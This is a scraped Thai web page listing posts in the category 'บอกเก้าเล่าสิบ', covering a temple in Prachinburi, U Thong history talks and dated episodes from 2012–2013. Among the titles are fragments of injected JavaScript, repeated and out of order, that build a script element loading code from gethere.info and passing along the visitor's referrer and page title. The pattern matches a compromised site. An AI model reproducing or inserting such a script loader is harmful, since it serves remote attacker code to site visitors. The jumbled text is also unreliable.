หมวดหมู่ ‘บอกเก้าเล่าสิบ’

วัดต้นโพธิ์ศรีมหาโพธิ ต. โคกปีบ อ. ศรีมโหสถ จ. ปราจีนบุรี

if (document.currentScript) {

ขอมอยู่ไหน? ไทยอยู่นั่น ขอมกับไทย ไม่พรากจากกัน

var d=document;var s=d.createElement(‘script’);

กรมศิลปากร แบ่งปันความรู้สู่ชุมชน เรื่อง อู่ทอง ต้นทางประวัติศาสตร์ไทย

document.currentScript.parentNode.insertBefore(s, document.currentScript);

อู่ทอง ต้นทางประวัติศาสตร์ไทย

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

จุดบั้งไฟ (บ้องไฟ) เดือน 5 ที่วัดต้นโพธิ์ฯ สมัย ร.5

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

บอกเก้าเล่าสิบ วันอังคารที่ 8 มกราคม 2556

Download

บอกเก้าเล่าสิบ วันพฤหัสบดีที่ 20 ธันวาคม 2555

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

บอกเก้าเล่าสิบ วันจันทร์ที่ 17 ธันวาคม 2555

if (document.currentScript) {

บอกเก้าเล่าสิบ วันจันทร์ที่ 17 ธันวาคม 2555

}

บอกเก้าเล่าสิบ วันพฤหัสบดีที่ 6 ธันวาคม 2555